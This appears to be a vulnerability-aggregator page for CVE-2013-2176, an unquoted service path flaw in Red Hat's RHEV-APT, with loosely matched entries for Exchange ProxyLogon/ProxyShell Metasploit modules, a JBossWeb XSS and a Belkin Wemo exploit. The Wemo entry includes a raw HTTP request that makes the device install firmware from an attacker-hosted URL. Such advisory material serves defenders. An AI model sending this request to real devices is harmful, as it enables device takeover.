CVE-2013-2176
published 2013-08-28CVE-2013-2176: Unquoted Windows search path vulnerability in the Red Hat Enterprise Virtualization Application Provisioning Tool (RHEV-APT) in the rhev-guest-tools-iso…
PriorityP426high7.2CVSS 2.0
AVLACLAuNCCICAC
EPSS
0.46%
37.0th percentile
Unquoted Windows search path vulnerability in the Red Hat Enterprise Virtualization Application Provisioning Tool (RHEV-APT) in the rhev-guest-tools-iso package 3.2 allows local users to gain privileges via a Trojan horse application.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| redhat | enterprise_virtualization | — | — |
| redhat | enterprise_virtualization | — | — |
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat7.2HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-r66r-pgpw-cf3r: Unquoted Windows search path vulnerability in the Red Hat Enterprise Virtualization Application Provisioning Tool (RHEV-APT) in the rhev-guest-tools-i
ghsa_unreviewed·2022-05-17
CVE-2013-2176 [HIGH] GHSA-r66r-pgpw-cf3r: Unquoted Windows search path vulnerability in the Red Hat Enterprise Virtualization Application Provisioning Tool (RHEV-APT) in the rhev-guest-tools-i
Unquoted Windows search path vulnerability in the Red Hat Enterprise Virtualization Application Provisioning Tool (RHEV-APT) in the rhev-guest-tools-iso package 3.2 allows local users to gain privileges via a Trojan horse application.
Red Hat
rhev-m: rhev-apt service unquoted search path
vendor_redhat·2013-07-31·CVSS 7.2
CVE-2013-2176 [HIGH] CWE-428 rhev-m: rhev-apt service unquoted search path
rhev-m: rhev-apt service unquoted search path
Unquoted Windows search path vulnerability in the Red Hat Enterprise Virtualization Application Provisioning Tool (RHEV-APT) in the rhev-guest-tools-iso package 3.2 allows local users to gain privileges via a Trojan horse application.
No detection rules found.
Exploit-DB
Belkin Wemo - Arbitrary Firmware Upload
exploitdb·2013-04-08·CVSS 9.8
CVE-2013-2748 [CRITICAL] Belkin Wemo - Arbitrary Firmware Upload
Belkin Wemo - Arbitrary Firmware Upload
---
# Exploit Title: Belkin Wemo Arbitrary Firmware Vulnerability
# Date: 4/3/13
# Exploit Author: Daniel Buentello
# Vendor Homepage: http://www.belkin.com/us/wemo
# Version: Any version prior to WeMo_US_2.00.2176.PVT
# CVE : CVE-2013-2748
POST /upnp/control/firmwareupdate1 HTTP/1.1
SOAPACTION: "urn:Belkin:service:firmwareupdate:1#UpdateFirmware"
Content-Length:
Content-Type: text/xml; charset="utf-8"
HOST: 10.0.1.8:49153
User-Agent:
07Jan20131http://10.0.1.99/bad_firmware.bin
PoC Video:
https://www.youtube.com/watch?v=BcW2q0aHOFo
Metasploit
Microsoft Exchange ProxyLogon Collector
metasploit·CVSS 9.8
CVE-2021-26855 [CRITICAL] Microsoft Exchange ProxyLogon Collector
Microsoft Exchange ProxyLogon Collector
This module exploit a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855). By taking advantage of this vulnerability, it is possible to dump all mailboxes (emails, attachments, contacts, ...). This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). All components are vulnerable by default.
Metasploit
Microsoft Exchange ProxyLogon Scanner
metasploit·CVSS 9.8
CVE-2021-26855 [CRITICAL] Microsoft Exchange ProxyLogon Scanner
Microsoft Exchange ProxyLogon Scanner
This module scan for a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin (CVE-2021-26855). By chaining this bug with another post-auth arbitrary-file-write vulnerability to get code execution (CVE-2021-27065). As a result, an unauthenticated attacker can execute arbitrary commands on Microsoft Exchange Server. This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). All components are vulnerable by default.
Metasploit
Microsoft Exchange ProxyShell RCE
metasploit·CVSS 6.6
CVE-2021-31207 [MEDIUM] Microsoft Exchange ProxyShell RCE
Microsoft Exchange ProxyShell RCE
This module exploits a vulnerability on Microsoft Exchange Server that allows an attacker to bypass the authentication (CVE-2021-31207), impersonate an arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve the RCE (Remote Code Execution). By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server. This vulnerability affects Exchange 2013 CU23 < 15.0.1497.15, Exchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5, Exchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9. All components are vulnerable by default.
Metasploit
Microsoft Exchange ProxyLogon RCE
metasploit·CVSS 9.8
CVE-2021-26855 [CRITICAL] Microsoft Exchange ProxyLogon RCE
Microsoft Exchange ProxyLogon RCE
This module exploit a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication, impersonating as the admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get the RCE (Remote Code Execution). By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server. This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). All components are vulnerable by default.
Bugzilla
CVE-2013-6495 JBossWeb Bayeux: Reflected Cross-Site Scripting (XSS)
bugzilla·2014-02-19·CVSS 6.1
CVE-2013-6495 [MEDIUM] CVE-2013-6495 JBossWeb Bayeux: Reflected Cross-Site Scripting (XSS)
CVE-2013-6495 JBossWeb Bayeux: Reflected Cross-Site Scripting (XSS)
It was found that the JBossWeb Bayeux component would include the contents of the jsonp request parameter in the response, without escaping. A remote attacker could use this flaw to perform reflected cross-site scripting (XSS) attacks under certain conditions. The content type of the response is text/json, which can still be interpreted as HTML by the browser if it uses content sniffing. If the browser evaluates the response, this flaw could be exploited by a DOM-based XSS attack.
Discussion:
Upstream Fix:
http://viewvc.jboss.org/cgi-bin/viewvc.cgi/jbossweb?view=revision&revision=2176
Upstream Bug:
https://issues.jboss.org/browse/JBWEB-267
---
Statement:
Red Hat JBoss Enterprise Application Platform 6 prior to 6.1.1
Bugzilla
CVE-2013-2176 rhev-m: rhev-apt service unquoted search path
bugzilla·2013-06-13·CVSS 7.2
CVE-2013-2176 [HIGH] CVE-2013-2176 rhev-m: rhev-apt service unquoted search path
CVE-2013-2176 rhev-m: rhev-apt service unquoted search path
An unquoted search path flaw was found in the way the Red Hat Enterprise Virtualization Apt service was installed on Windows. Depending on the permissions of the directories in the unquoted search path, a local, unprivileged user could use this flaw to have a binary of their choosing executed with SYSTEM privileges.
Acknowledgements:
This issue was discovered by Jiri Belka of Red Hat.
Discussion:
This issue has been addressed in following products:
RHEV Manager version 3.2
Via RHSA-2013:1122 https://rhn.redhat.com/errata/RHSA-2013-1122.html
2013-08-28
Published